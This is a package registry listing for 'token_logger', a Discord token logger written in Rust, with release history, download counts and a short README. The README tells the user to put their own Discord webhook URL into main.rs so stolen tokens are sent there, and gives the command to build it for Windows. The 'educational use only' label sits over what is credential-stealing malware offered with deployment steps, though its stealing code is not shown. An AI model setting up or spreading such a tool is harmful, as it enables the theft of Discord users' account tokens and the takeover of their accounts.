#logger #token #discord #educational #webhook #build #line

app token_logger

A discord token logger written in rust, DO NOT RUN, for educational use only

1 stable release

2.0.1 Sep 3, 2022
1.0.0 Aug 17, 2022
0.0.1 Aug 31, 2022

#57 in #educational

Download history 6/week @ 2024-02-21 10/week @ 2024-02-28 2/week @ 2024-03-27 6/week @ 2024-04-03 55/week @ 2024-04-10

63 downloads per month

GPL-3.0-only

22KB
102 lines

TokenLogger-rs

A Discord Token Logger Written in Rust

On line 7 in main.rs (shown below) you must replace the variable with your webhook url

let url = "Discord Webhook URL";

To build just do

$ cargo build --target x86_64-pc-windows-gnu

Sidenote, I hate strings.

Dependencies

~5–14MB
~148K SLoC